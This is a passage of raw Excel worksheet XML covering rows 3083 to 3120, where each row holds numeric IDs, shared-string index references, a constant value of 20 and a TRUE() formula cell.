      <c r="J3083" t="s">
        <v>3718</v>
      </c>
      <c r="K3083">
        <v>0</v>
      </c>
      <c r="R3083" t="s">
        <v>115</v>
      </c>
      <c r="S3083" t="s">
        <v>3683</v>
      </c>
      <c r="T3083" t="s">
        <v>7</v>
      </c>
      <c r="U3083" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3084" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3084" s="1">
        <v>19452</v>
      </c>
      <c r="B3084" t="s">
        <v>10</v>
      </c>
      <c r="C3084" t="s">
        <v>11</v>
      </c>
      <c r="D3084" t="s">
        <v>3719</v>
      </c>
      <c r="E3084" t="s">
        <v>3680</v>
      </c>
      <c r="F3084">
        <v>20</v>
      </c>
      <c r="G3084" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3084" t="s">
        <v>3720</v>
      </c>
      <c r="K3084">
        <v>0</v>
      </c>
      <c r="R3084" t="s">
        <v>115</v>
      </c>
      <c r="S3084" t="s">
        <v>3683</v>
      </c>
      <c r="T3084" t="s">
        <v>7</v>
      </c>
      <c r="U3084" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3085" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3085" s="1">
        <v>19453</v>
      </c>
      <c r="B3085" t="s">
        <v>10</v>
      </c>
      <c r="C3085" t="s">
        <v>11</v>
      </c>
      <c r="D3085" t="s">
        <v>3719</v>
      </c>
      <c r="E3085" t="s">
        <v>3680</v>
      </c>
      <c r="F3085">
        <v>20</v>
      </c>
      <c r="G3085" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3085" t="s">
        <v>3721</v>
      </c>
      <c r="K3085">
        <v>0</v>
      </c>
      <c r="R3085" t="s">
        <v>115</v>
      </c>
      <c r="S3085" t="s">
        <v>3683</v>
      </c>
      <c r="T3085" t="s">
        <v>7</v>
      </c>
      <c r="U3085" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3086" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3086" s="1">
        <v>19454</v>
      </c>
      <c r="B3086" t="s">
        <v>10</v>
      </c>
      <c r="C3086" t="s">
        <v>11</v>
      </c>
      <c r="D3086" t="s">
        <v>3719</v>
      </c>
      <c r="E3086" t="s">
        <v>3680</v>
      </c>
      <c r="F3086">
        <v>20</v>
      </c>
      <c r="G3086" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3086" t="s">
        <v>3722</v>
      </c>
      <c r="K3086">
        <v>0</v>
      </c>
      <c r="R3086" t="s">
        <v>115</v>
      </c>
      <c r="S3086" t="s">
        <v>3683</v>
      </c>
      <c r="T3086" t="s">
        <v>7</v>
      </c>
      <c r="U3086" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3087" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3087" s="1">
        <v>19455</v>
      </c>
      <c r="B3087" t="s">
        <v>10</v>
      </c>
      <c r="C3087" t="s">
        <v>11</v>
      </c>
      <c r="D3087" t="s">
        <v>3719</v>
      </c>
      <c r="E3087" t="s">
        <v>3680</v>
      </c>
      <c r="F3087">
        <v>20</v>
      </c>
      <c r="G3087" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3087" t="s">
        <v>3723</v>
      </c>
      <c r="K3087">
        <v>0</v>
      </c>
      <c r="R3087" t="s">
        <v>115</v>
      </c>
      <c r="S3087" t="s">
        <v>3683</v>
      </c>
      <c r="T3087" t="s">
        <v>7</v>
      </c>
      <c r="U3087" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3088" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3088" s="1">
        <v>19456</v>
      </c>
      <c r="B3088" t="s">
        <v>10</v>
      </c>
      <c r="C3088" t="s">
        <v>11</v>
      </c>
      <c r="D3088" t="s">
        <v>3719</v>
      </c>
      <c r="E3088" t="s">
        <v>3680</v>
      </c>
      <c r="F3088">
        <v>20</v>
      </c>
      <c r="G3088" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3088" t="s">
        <v>3724</v>
      </c>
      <c r="K3088">
        <v>0</v>
      </c>
      <c r="R3088" t="s">
        <v>115</v>
      </c>
      <c r="S3088" t="s">
        <v>3683</v>
      </c>
      <c r="T3088" t="s">
        <v>7</v>
      </c>
      <c r="U3088" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3089" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3089" s="1">
        <v>19457</v>
      </c>
      <c r="B3089" t="s">
        <v>10</v>
      </c>
      <c r="C3089" t="s">
        <v>11</v>
      </c>
      <c r="D3089" t="s">
        <v>3719</v>
      </c>
      <c r="E3089" t="s">
        <v>3680</v>
      </c>
      <c r="F3089">
        <v>20</v>
      </c>
      <c r="G3089" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3089" t="s">
        <v>3725</v>
      </c>
      <c r="K3089">
        <v>0</v>
      </c>
      <c r="R3089" t="s">
        <v>115</v>
      </c>
      <c r="S3089" t="s">
        <v>3683</v>
      </c>
      <c r="T3089" t="s">
        <v>7</v>
      </c>
      <c r="U3089" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3090" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3090" s="1">
        <v>19458</v>
      </c>
      <c r="B3090" t="s">
        <v>10</v>
      </c>
      <c r="C3090" t="s">
        <v>11</v>
      </c>
      <c r="D3090" t="s">
        <v>3719</v>
      </c>
      <c r="E3090" t="s">
        <v>3680</v>
      </c>
      <c r="F3090">
        <v>20</v>
      </c>
      <c r="G3090" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3090" t="s">
        <v>3726</v>
      </c>
      <c r="K3090">
        <v>0</v>
      </c>
      <c r="R3090" t="s">
        <v>115</v>
      </c>
      <c r="S3090" t="s">
        <v>3683</v>
      </c>
      <c r="T3090" t="s">
        <v>7</v>
      </c>
      <c r="U3090" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3091" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3091" s="1">
        <v>19459</v>
      </c>
      <c r="B3091" t="s">
        <v>10</v>
      </c>
      <c r="C3091" t="s">
        <v>11</v>
      </c>
      <c r="D3091" t="s">
        <v>3719</v>
      </c>
      <c r="E3091" t="s">
        <v>3680</v>
      </c>
      <c r="F3091">
        <v>20</v>
      </c>
      <c r="G3091" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3091" t="s">
        <v>3727</v>
      </c>
      <c r="K3091">
        <v>0</v>
      </c>
      <c r="R3091" t="s">
        <v>115</v>
      </c>
      <c r="S3091" t="s">
        <v>3683</v>
      </c>
      <c r="T3091" t="s">
        <v>7</v>
      </c>
      <c r="U3091" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3092" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3092" s="1">
        <v>19460</v>
      </c>
      <c r="B3092" t="s">
        <v>10</v>
      </c>
      <c r="C3092" t="s">
        <v>11</v>
      </c>
      <c r="D3092" t="s">
        <v>3719</v>
      </c>
      <c r="E3092" t="s">
        <v>3680</v>
      </c>
      <c r="F3092">
        <v>20</v>
      </c>
      <c r="G3092" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3092" t="s">
        <v>3728</v>
      </c>
      <c r="K3092">
        <v>0</v>
      </c>
      <c r="R3092" t="s">
        <v>115</v>
      </c>
      <c r="S3092" t="s">
        <v>3683</v>
      </c>
      <c r="T3092" t="s">
        <v>7</v>
      </c>
      <c r="U3092" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3093" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3093" s="1">
        <v>19461</v>
      </c>
      <c r="B3093" t="s">
        <v>10</v>
      </c>
      <c r="C3093" t="s">
        <v>11</v>
      </c>
      <c r="D3093" t="s">
        <v>3719</v>
      </c>
      <c r="E3093" t="s">
        <v>3680</v>
      </c>
      <c r="F3093">
        <v>20</v>
      </c>
      <c r="G3093" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3093" t="s">
        <v>3729</v>
      </c>
      <c r="K3093">
        <v>0</v>
      </c>
      <c r="R3093" t="s">
        <v>115</v>
      </c>
      <c r="S3093" t="s">
        <v>3683</v>
      </c>
      <c r="T3093" t="s">
        <v>7</v>
      </c>
      <c r="U3093" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3094" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3094" s="1">
        <v>19462</v>
      </c>
      <c r="B3094" t="s">
        <v>10</v>
      </c>
      <c r="C3094" t="s">
        <v>11</v>
      </c>
      <c r="D3094" t="s">
        <v>3719</v>
      </c>
      <c r="E3094" t="s">
        <v>3680</v>
      </c>
      <c r="F3094">
        <v>20</v>
      </c>
      <c r="G3094" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3094" t="s">
        <v>3730</v>
      </c>
      <c r="K3094">
        <v>0</v>
      </c>
      <c r="R3094" t="s">
        <v>115</v>
      </c>
      <c r="S3094" t="s">
        <v>3683</v>
      </c>
      <c r="T3094" t="s">
        <v>7</v>
      </c>
      <c r="U3094" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3095" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3095" s="1">
        <v>19463</v>
      </c>
      <c r="B3095" t="s">
        <v>10</v>
      </c>
      <c r="C3095" t="s">
        <v>11</v>
      </c>
      <c r="D3095" t="s">
        <v>3719</v>
      </c>
      <c r="E3095" t="s">
        <v>3680</v>
      </c>
      <c r="F3095">
        <v>20</v>
      </c>
      <c r="G3095" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3095" t="s">
        <v>3731</v>
      </c>
      <c r="K3095">
        <v>0</v>
      </c>
      <c r="R3095" t="s">
        <v>115</v>
      </c>
      <c r="S3095" t="s">
        <v>3683</v>
      </c>
      <c r="T3095" t="s">
        <v>7</v>
      </c>
      <c r="U3095" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3096" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3096" s="1">
        <v>19464</v>
      </c>
      <c r="B3096" t="s">
        <v>10</v>
      </c>
      <c r="C3096" t="s">
        <v>11</v>
      </c>
      <c r="D3096" t="s">
        <v>3719</v>
      </c>
      <c r="E3096" t="s">
        <v>3680</v>
      </c>
      <c r="F3096">
        <v>20</v>
      </c>
      <c r="G3096" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3096" t="s">
        <v>3732</v>
      </c>
      <c r="K3096">
        <v>0</v>
      </c>
      <c r="R3096" t="s">
        <v>115</v>
      </c>
      <c r="S3096" t="s">
        <v>3683</v>
      </c>
      <c r="T3096" t="s">
        <v>7</v>
      </c>
      <c r="U3096" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3097" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3097" s="1">
        <v>19465</v>
      </c>
      <c r="B3097" t="s">
        <v>10</v>
      </c>
      <c r="C3097" t="s">
        <v>11</v>
      </c>
      <c r="D3097" t="s">
        <v>3719</v>
      </c>
      <c r="E3097" t="s">
        <v>3680</v>
      </c>
      <c r="F3097">
        <v>20</v>
      </c>
      <c r="G3097" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3097" t="s">
        <v>3733</v>
      </c>
      <c r="K3097">
        <v>0</v>
      </c>
      <c r="R3097" t="s">
        <v>115</v>
      </c>
      <c r="S3097" t="s">
        <v>3683</v>
      </c>
      <c r="T3097" t="s">
        <v>7</v>
      </c>
      <c r="U3097" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3098" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3098" s="1">
        <v>19466</v>
      </c>
      <c r="B3098" t="s">
        <v>10</v>
      </c>
      <c r="C3098" t="s">
        <v>11</v>
      </c>
      <c r="D3098" t="s">
        <v>3719</v>
      </c>
      <c r="E3098" t="s">
        <v>3680</v>
      </c>
      <c r="F3098">
        <v>20</v>
      </c>
      <c r="G3098" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3098" t="s">
        <v>3734</v>
      </c>
      <c r="K3098">
        <v>0</v>
      </c>
      <c r="R3098" t="s">
        <v>115</v>
      </c>
      <c r="S3098" t="s">
        <v>3683</v>
      </c>
      <c r="T3098" t="s">
        <v>7</v>
      </c>
      <c r="U3098" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3099" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3099" s="1">
        <v>19467</v>
      </c>
      <c r="B3099" t="s">
        <v>10</v>
      </c>
      <c r="C3099" t="s">
        <v>11</v>
      </c>
      <c r="D3099" t="s">
        <v>3719</v>
      </c>
      <c r="E3099" t="s">
        <v>3680</v>
      </c>
      <c r="F3099">
        <v>20</v>
      </c>
      <c r="G3099" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3099" t="s">
        <v>3735</v>
      </c>
      <c r="K3099">
        <v>0</v>
      </c>
      <c r="R3099" t="s">
        <v>115</v>
      </c>
      <c r="S3099" t="s">
        <v>3683</v>
      </c>
      <c r="T3099" t="s">
        <v>7</v>
      </c>
      <c r="U3099" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3100" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3100" s="1">
        <v>19468</v>
      </c>
      <c r="B3100" t="s">
        <v>10</v>
      </c>
      <c r="C3100" t="s">
        <v>11</v>
      </c>
      <c r="D3100" t="s">
        <v>3719</v>
      </c>
      <c r="E3100" t="s">
        <v>3680</v>
      </c>
      <c r="F3100">
        <v>20</v>
      </c>
      <c r="G3100" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3100" t="s">
        <v>3736</v>
      </c>
      <c r="K3100">
        <v>0</v>
      </c>
      <c r="R3100" t="s">
        <v>115</v>
      </c>
      <c r="S3100" t="s">
        <v>3683</v>
      </c>
      <c r="T3100" t="s">
        <v>7</v>
      </c>
      <c r="U3100" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3101" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3101" s="1">
        <v>19469</v>
      </c>
      <c r="B3101" t="s">
        <v>10</v>
      </c>
      <c r="C3101" t="s">
        <v>11</v>
      </c>
      <c r="D3101" t="s">
        <v>3719</v>
      </c>
      <c r="E3101" t="s">
        <v>3680</v>
      </c>
      <c r="F3101">
        <v>20</v>
      </c>
      <c r="G3101" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3101" t="s">
        <v>3737</v>
      </c>
      <c r="K3101">
        <v>0</v>
      </c>
      <c r="R3101" t="s">
        <v>115</v>
      </c>
      <c r="S3101" t="s">
        <v>3683</v>
      </c>
      <c r="T3101" t="s">
        <v>7</v>
      </c>
      <c r="U3101" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3102" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3102" s="1">
        <v>19470</v>
      </c>
      <c r="B3102" t="s">
        <v>10</v>
      </c>
      <c r="C3102" t="s">
        <v>11</v>
      </c>
      <c r="D3102" t="s">
        <v>3719</v>
      </c>
      <c r="E3102" t="s">
        <v>3680</v>
      </c>
      <c r="F3102">
        <v>20</v>
      </c>
      <c r="G3102" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3102" t="s">
        <v>3738</v>
      </c>
      <c r="K3102">
        <v>0</v>
      </c>
      <c r="R3102" t="s">
        <v>115</v>
      </c>
      <c r="S3102" t="s">
        <v>3683</v>
      </c>
      <c r="T3102" t="s">
        <v>7</v>
      </c>
      <c r="U3102" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3103" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3103" s="1">
        <v>19471</v>
      </c>
      <c r="B3103" t="s">
        <v>10</v>
      </c>
      <c r="C3103" t="s">
        <v>11</v>
      </c>
      <c r="D3103" t="s">
        <v>3719</v>
      </c>
      <c r="E3103" t="s">
        <v>3680</v>
      </c>
      <c r="F3103">
        <v>20</v>
      </c>
      <c r="G3103" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3103" t="s">
        <v>3739</v>
      </c>
      <c r="K3103">
        <v>0</v>
      </c>
      <c r="R3103" t="s">
        <v>115</v>
      </c>
      <c r="S3103" t="s">
        <v>3683</v>
      </c>
      <c r="T3103" t="s">
        <v>7</v>
      </c>
      <c r="U3103" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3104" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3104" s="1">
        <v>19472</v>
      </c>
      <c r="B3104" t="s">
        <v>10</v>
      </c>
      <c r="C3104" t="s">
        <v>11</v>
      </c>
      <c r="D3104" t="s">
        <v>3719</v>
      </c>
      <c r="E3104" t="s">
        <v>3680</v>
      </c>
      <c r="F3104">
        <v>20</v>
      </c>
      <c r="G3104" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3104" t="s">
        <v>3740</v>
      </c>
      <c r="K3104">
        <v>0</v>
      </c>
      <c r="R3104" t="s">
        <v>115</v>
      </c>
      <c r="S3104" t="s">
        <v>3683</v>
      </c>
      <c r="T3104" t="s">
        <v>7</v>
      </c>
      <c r="U3104" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3105" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3105" s="1">
        <v>19473</v>
      </c>
      <c r="B3105" t="s">
        <v>10</v>
      </c>
      <c r="C3105" t="s">
        <v>11</v>
      </c>
      <c r="D3105" t="s">
        <v>3719</v>
      </c>
      <c r="E3105" t="s">
        <v>3680</v>
      </c>
      <c r="F3105">
        <v>20</v>
      </c>
      <c r="G3105" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3105" t="s">
        <v>3741</v>
      </c>
      <c r="K3105">
        <v>0</v>
      </c>
      <c r="R3105" t="s">
        <v>115</v>
      </c>
      <c r="S3105" t="s">
        <v>3683</v>
      </c>
      <c r="T3105" t="s">
        <v>7</v>
      </c>
      <c r="U3105" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3106" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3106" s="1">
        <v>19474</v>
      </c>
      <c r="B3106" t="s">
        <v>10</v>
      </c>
      <c r="C3106" t="s">
        <v>11</v>
      </c>
      <c r="D3106" t="s">
        <v>3719</v>
      </c>
      <c r="E3106" t="s">
        <v>3680</v>
      </c>
      <c r="F3106">
        <v>20</v>
      </c>
      <c r="G3106" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3106" t="s">
        <v>3742</v>
      </c>
      <c r="K3106">
        <v>0</v>
      </c>
      <c r="R3106" t="s">
        <v>115</v>
      </c>
      <c r="S3106" t="s">
        <v>3683</v>
      </c>
      <c r="T3106" t="s">
        <v>7</v>
      </c>
      <c r="U3106" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3107" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3107" s="1">
        <v>19475</v>
      </c>
      <c r="B3107" t="s">
        <v>10</v>
      </c>
      <c r="C3107" t="s">
        <v>11</v>
      </c>
      <c r="D3107" t="s">
        <v>3719</v>
      </c>
      <c r="E3107" t="s">
        <v>3680</v>
      </c>
      <c r="F3107">
        <v>20</v>
      </c>
      <c r="G3107" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3107" t="s">
        <v>3743</v>
      </c>
      <c r="K3107">
        <v>0</v>
      </c>
      <c r="R3107" t="s">
        <v>115</v>
      </c>
      <c r="S3107" t="s">
        <v>3683</v>
      </c>
      <c r="T3107" t="s">
        <v>7</v>
      </c>
      <c r="U3107" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3108" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3108" s="1">
        <v>19476</v>
      </c>
      <c r="B3108" t="s">
        <v>10</v>
      </c>
      <c r="C3108" t="s">
        <v>11</v>
      </c>
      <c r="D3108" t="s">
        <v>3719</v>
      </c>
      <c r="E3108" t="s">
        <v>3680</v>
      </c>
      <c r="F3108">
        <v>20</v>
      </c>
      <c r="G3108" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3108" t="s">
        <v>3744</v>
      </c>
      <c r="K3108">
        <v>0</v>
      </c>
      <c r="R3108" t="s">
        <v>115</v>
      </c>
      <c r="S3108" t="s">
        <v>3683</v>
      </c>
      <c r="T3108" t="s">
        <v>7</v>
      </c>
      <c r="U3108" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3109" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3109" s="1">
        <v>19477</v>
      </c>
      <c r="B3109" t="s">
        <v>10</v>
      </c>
      <c r="C3109" t="s">
        <v>11</v>
      </c>
      <c r="D3109" t="s">
        <v>3719</v>
      </c>
      <c r="E3109" t="s">
        <v>3680</v>
      </c>
      <c r="F3109">
        <v>20</v>
      </c>
      <c r="G3109" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3109" t="s">
        <v>3745</v>
      </c>
      <c r="K3109">
        <v>0</v>
      </c>
      <c r="R3109" t="s">
        <v>115</v>
      </c>
      <c r="S3109" t="s">
        <v>3683</v>
      </c>
      <c r="T3109" t="s">
        <v>7</v>
      </c>
      <c r="U3109" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3110" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3110" s="1">
        <v>19478</v>
      </c>
      <c r="B3110" t="s">
        <v>10</v>
      </c>
      <c r="C3110" t="s">
        <v>11</v>
      </c>
      <c r="D3110" t="s">
        <v>3719</v>
      </c>
      <c r="E3110" t="s">
        <v>3680</v>
      </c>
      <c r="F3110">
        <v>20</v>
      </c>
      <c r="G3110" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3110" t="s">
        <v>3746</v>
      </c>
      <c r="K3110">
        <v>0</v>
      </c>
      <c r="R3110" t="s">
        <v>115</v>
      </c>
      <c r="S3110" t="s">
        <v>3683</v>
      </c>
      <c r="T3110" t="s">
        <v>7</v>
      </c>
      <c r="U3110" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3111" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3111" s="1">
        <v>19479</v>
      </c>
      <c r="B3111" t="s">
        <v>10</v>
      </c>
      <c r="C3111" t="s">
        <v>11</v>
      </c>
      <c r="D3111" t="s">
        <v>3719</v>
      </c>
      <c r="E3111" t="s">
        <v>3680</v>
      </c>
      <c r="F3111">
        <v>20</v>
      </c>
      <c r="G3111" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3111" t="s">
        <v>3747</v>
      </c>
      <c r="K3111">
        <v>0</v>
      </c>
      <c r="R3111" t="s">
        <v>115</v>
      </c>
      <c r="S3111" t="s">
        <v>3683</v>
      </c>
      <c r="T3111" t="s">
        <v>7</v>
      </c>
      <c r="U3111" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3112" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3112" s="1">
        <v>19480</v>
      </c>
      <c r="B3112" t="s">
        <v>10</v>
      </c>
      <c r="C3112" t="s">
        <v>11</v>
      </c>
      <c r="D3112" t="s">
        <v>3719</v>
      </c>
      <c r="E3112" t="s">
        <v>3680</v>
      </c>
      <c r="F3112">
        <v>20</v>
      </c>
      <c r="G3112" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3112" t="s">
        <v>3748</v>
      </c>
      <c r="K3112">
        <v>0</v>
      </c>
      <c r="R3112" t="s">
        <v>115</v>
      </c>
      <c r="S3112" t="s">
        <v>3683</v>
      </c>
      <c r="T3112" t="s">
        <v>7</v>
      </c>
      <c r="U3112" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3113" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3113" s="1">
        <v>19481</v>
      </c>
      <c r="B3113" t="s">
        <v>10</v>
      </c>
      <c r="C3113" t="s">
        <v>11</v>
      </c>
      <c r="D3113" t="s">
        <v>3719</v>
      </c>
      <c r="E3113" t="s">
        <v>3680</v>
      </c>
      <c r="F3113">
        <v>20</v>
      </c>
      <c r="G3113" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3113" t="s">
        <v>3749</v>
      </c>
      <c r="K3113">
        <v>0</v>
      </c>
      <c r="R3113" t="s">
        <v>115</v>
      </c>
      <c r="S3113" t="s">
        <v>3683</v>
      </c>
      <c r="T3113" t="s">
        <v>7</v>
      </c>
      <c r="U3113" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3114" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3114" s="1">
        <v>19482</v>
      </c>
      <c r="B3114" t="s">
        <v>10</v>
      </c>
      <c r="C3114" t="s">
        <v>11</v>
      </c>
      <c r="D3114" t="s">
        <v>3719</v>
      </c>
      <c r="E3114" t="s">
        <v>3680</v>
      </c>
      <c r="F3114">
        <v>20</v>
      </c>
      <c r="G3114" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3114" t="s">
        <v>3750</v>
      </c>
      <c r="K3114">
        <v>0</v>
      </c>
      <c r="R3114" t="s">
        <v>115</v>
      </c>
      <c r="S3114" t="s">
        <v>3683</v>
      </c>
      <c r="T3114" t="s">
        <v>7</v>
      </c>
      <c r="U3114" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3115" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3115" s="1">
        <v>19483</v>
      </c>
      <c r="B3115" t="s">
        <v>10</v>
      </c>
      <c r="C3115" t="s">
        <v>11</v>
      </c>
      <c r="D3115" t="s">
        <v>3719</v>
      </c>
      <c r="E3115" t="s">
        <v>3680</v>
      </c>
      <c r="F3115">
        <v>20</v>
      </c>
      <c r="G3115" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3115" t="s">
        <v>3751</v>
      </c>
      <c r="K3115">
        <v>0</v>
      </c>
      <c r="R3115" t="s">
        <v>115</v>
      </c>
      <c r="S3115" t="s">
        <v>3683</v>
      </c>
      <c r="T3115" t="s">
        <v>7</v>
      </c>
      <c r="U3115" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3116" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3116" s="1">
        <v>19484</v>
      </c>
      <c r="B3116" t="s">
        <v>10</v>
      </c>
      <c r="C3116" t="s">
        <v>11</v>
      </c>
      <c r="D3116" t="s">
        <v>3719</v>
      </c>
      <c r="E3116" t="s">
        <v>3680</v>
      </c>
      <c r="F3116">
        <v>20</v>
      </c>
      <c r="G3116" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3116" t="s">
        <v>3752</v>
      </c>
      <c r="K3116">
        <v>0</v>
      </c>
      <c r="R3116" t="s">
        <v>115</v>
      </c>
      <c r="S3116" t="s">
        <v>3683</v>
      </c>
      <c r="T3116" t="s">
        <v>7</v>
      </c>
      <c r="U3116" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3117" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3117" s="1">
        <v>19485</v>
      </c>
      <c r="B3117" t="s">
        <v>10</v>
      </c>
      <c r="C3117" t="s">
        <v>11</v>
      </c>
      <c r="D3117" t="s">
        <v>3719</v>
      </c>
      <c r="E3117" t="s">
        <v>3680</v>
      </c>
      <c r="F3117">
        <v>20</v>
      </c>
      <c r="G3117" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3117" t="s">
        <v>3753</v>
      </c>
      <c r="K3117">
        <v>0</v>
      </c>
      <c r="R3117" t="s">
        <v>115</v>
      </c>
      <c r="S3117" t="s">
        <v>3683</v>
      </c>
      <c r="T3117" t="s">
        <v>7</v>
      </c>
      <c r="U3117" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3118" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3118" s="1">
        <v>19486</v>
      </c>
      <c r="B3118" t="s">
        <v>10</v>
      </c>
      <c r="C3118" t="s">
        <v>11</v>
      </c>
      <c r="D3118" t="s">
        <v>3719</v>
      </c>
      <c r="E3118" t="s">
        <v>3680</v>
      </c>
      <c r="F3118">
        <v>20</v>
      </c>
      <c r="G3118" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3118" t="s">
        <v>3754</v>
      </c>
      <c r="K3118">
        <v>0</v>
      </c>
      <c r="R3118" t="s">
        <v>115</v>
      </c>
      <c r="S3118" t="s">
        <v>3683</v>
      </c>
      <c r="T3118" t="s">
        <v>7</v>
      </c>
      <c r="U3118" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3119" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3119" s="1">
        <v>19487</v>
      </c>
      <c r="B3119" t="s">
        <v>10</v>
      </c>
      <c r="C3119" t="s">
        <v>11</v>
      </c>
      <c r="D3119" t="s">
        <v>3719</v>
      </c>
      <c r="E3119" t="s">
        <v>3680</v>
      </c>
      <c r="F3119">
        <v>20</v>
      </c>
      <c r="G3119" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3119" t="s">
        <v>3755</v>
      </c>
      <c r="K3119">
        <v>0</v>
      </c>
      <c r="R3119" t="s">
        <v>115</v>
      </c>
      <c r="S3119" t="s">
        <v>3683</v>
      </c>
      <c r="T3119" t="s">
        <v>7</v>
      </c>
      <c r="U3119" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="3120" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3120" s="1">
        <v>19488</v>
      </c>
